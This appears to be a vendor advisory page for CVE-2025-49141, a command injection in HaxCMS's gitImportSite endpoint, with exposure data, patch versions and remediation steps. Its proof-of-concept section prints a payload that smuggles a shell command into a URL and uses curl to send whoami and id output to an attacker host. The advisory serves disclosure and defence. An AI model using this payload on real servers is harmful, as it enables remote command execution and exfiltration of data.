NIST deprecates RSA-2048 from 2030. Find every one of them before attackers do.
📦
📦 npm
Not in CISA KEV
HIGH severity

CVE-2025-49141 — @haxtheweb/haxcms-nodejs

HIGHFix: haxtheweb/haxcms-nodejs@5131fea

CVE-2025-49141 is a high-severity (CVSS 8.5) OS Command Injection vulnerability in @haxtheweb/haxcms-nodejs. A fix is available for @haxtheweb/haxcms-nodejs — see the affected versions and patch details below.

HaxCMS-PHP Command Injection Vulnerability

Also known asGHSA-g4cf-pp4x-hqgw
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Oct 31, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • A successful exploit gives an attacker total control of the affected component, not partial access.

Exploitation and automatability from CISA’s SSVC triage for CVE-2025-49141.

EPSS Exploitation Probability

via FIRST.org ↗
1.5%probability of exploitation in next 30 days
Lower Risk+0.03%
Lower risk than most CVEs74th percentile — riskier than 74% of all scored CVEsHighest risk
0.36%1.87%3.37%4.88%1.2%1.5%Apr 26Aug 26Oct 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

Where this sits among everything scored

Real-World Exposure

1 pkg affected

How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.

1other npm packages depend on this — each one inherits the vulnerability until it's patched upstream
@haxtheweb/haxcms-nodejsnpm
983downloads / week

Description

Summary

The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection.

Details

The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection. gitImportSite

Affected Resources

• Operations.php:2103 gitImportSite() • <domain>/<user>/system/api/gitImportSite

PoC

To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite').

  1. Start a webserver. webserver

  2. Initiate a request to the ’archiveSite’ endpoint. archiveSite

  3. Capture and modify the request in BurpSuite. request-modification

  4. Observe command output in the HTTP request from the server. command-output

Command Injection Payload

http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef

Impact

An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
📦npm@haxtheweb/haxcms-nodejsall versions11.0.3npm install @haxtheweb/haxcms-nodejs@11.0.3

Affected Products

2 products · 2 configurations
Application
haxcms-nodejspsu
< 11.0.3
range
Application
haxcms-phppsu
< 11.0.0
range

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for @haxtheweb/haxcms-nodejs, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update @haxtheweb/haxcms-nodejs to 11.0.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-49141 is resolved across your whole dependency graph.

  3. Workarounds

    Stop passing untrusted input into the interpreter or shell: call the affected binary with an argument array rather than a composed command string, reject anything outside a strict allowlist of expected values, and run the component under an account that cannot reach beyond the work it legitimately does.

Frequently Asked Questions

### Summary The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection. ### Details The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection. ![gitImportSite](https://github.com/user-attachments/ass
O3 Security · Impact-Aware SCA

Is CVE-2025-49141 in your dependencies?

Find it across npm, including transitive dependencies.

CVE-2025-49141: @haxtheweb/haxcms — Fixed in 11.0.3